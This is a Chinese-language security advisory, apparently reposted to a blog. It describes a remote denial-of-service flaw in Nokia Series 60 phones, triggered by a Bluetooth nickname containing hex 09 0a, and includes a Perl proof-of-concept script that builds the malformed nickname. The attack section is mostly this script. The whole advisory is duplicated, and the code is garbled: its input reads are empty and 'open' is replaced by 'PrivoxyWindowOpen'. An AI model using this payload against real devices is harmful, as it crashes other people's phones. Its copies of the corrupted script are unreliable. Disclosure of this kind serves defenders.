Nokia Symbian 60系列蓝牙昵称拒绝服务漏洞
受影响系统:
Nokia 60系列手机
描述:
--------------------------------------------------------------------------------
Nokia是世界上最大的手机生产商,60系列是其生产的一系列手机型号。
Nokia 60系列手机存在远程拒绝服务漏洞,攻击者可以利用此漏洞使受害的手机重启。
起因是操作系统不能处理畸形的网络数据。在使用蓝牙设备时,如果用户的昵称为16进制" 09 0a "的话,就可能导致其他搜索到该设备用户的Nokia手机重启。
导致重启的昵称如下:
[任意内容][16进制的09 0a][任意内容]
必须在09 0a前添加任意内容,因为nokia手机以为09 0a是末尾的空间,会将其删除。
<*来源:Qnix (Qnix@bsdmail.org) 链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111989132510547&w=2 *>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
nokia-bt-cx.pl
-------------start---------------
#!/usr/bin/perl -w
my $btnick;
my $bth;
my $bts;
my $file;
$bth = " .";
print "\n*******************************************************\n";
print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **\n";
print "** BY QNIX Q-nix[@]bsdmail[dot]org **\n";
print "*******************************************************\n";
print " \n write your nickname : ";
$btnick =;
chomp($btnick);
print " \n OUTPUT : ";
$file =;
chomp($file);
PrivoxyWindowOpen(BLUEN, ">>$file") die "Could not create file $!\n";
$bts = "$btnick$bth";
print BLUEN ("$bts");
close(BLUEN);
print "\n Done !! , send the output to your nokia and copy the file to the bluetooth \
nickname space . \n\n";
-------------end-----------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
Nokia
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.nokia.com
Nokia 60系列手机
描述:
--------------------------------------------------------------------------------
Nokia是世界上最大的手机生产商,60系列是其生产的一系列手机型号。
Nokia 60系列手机存在远程拒绝服务漏洞,攻击者可以利用此漏洞使受害的手机重启。
起因是操作系统不能处理畸形的网络数据。在使用蓝牙设备时,如果用户的昵称为16进制" 09 0a "的话,就可能导致其他搜索到该设备用户的Nokia手机重启。
导致重启的昵称如下:
[任意内容][16进制的09 0a][任意内容]
必须在09 0a前添加任意内容,因为nokia手机以为09 0a是末尾的空间,会将其删除。
<*来源:Qnix (Qnix@bsdmail.org) 链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111989132510547&w=2 *>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
nokia-bt-cx.pl
-------------start---------------
#!/usr/bin/perl -w
my $btnick;
my $bth;
my $bts;
my $file;
$bth = " .";
print "\n*******************************************************\n";
print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **\n";
print "** BY QNIX Q-nix[@]bsdmail[dot]org **\n";
print "*******************************************************\n";
print " \n write your nickname : ";
$btnick =
chomp($btnick);
print " \n OUTPUT : ";
$file =
chomp($file);
PrivoxyWindowOpen(BLUEN, ">>$file") die "Could not create file $!\n";
$bts = "$btnick$bth";
print BLUEN ("$bts");
close(BLUEN);
print "\n Done !! , send the output to your nokia and copy the file to the bluetooth \
nickname space . \n\n";
-------------end-----------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
Nokia
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.nokia.com
Labels: Nokia Symbian s60 蓝牙昵称拒绝服务漏洞
posted by Daniel @ 9:18 AM
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home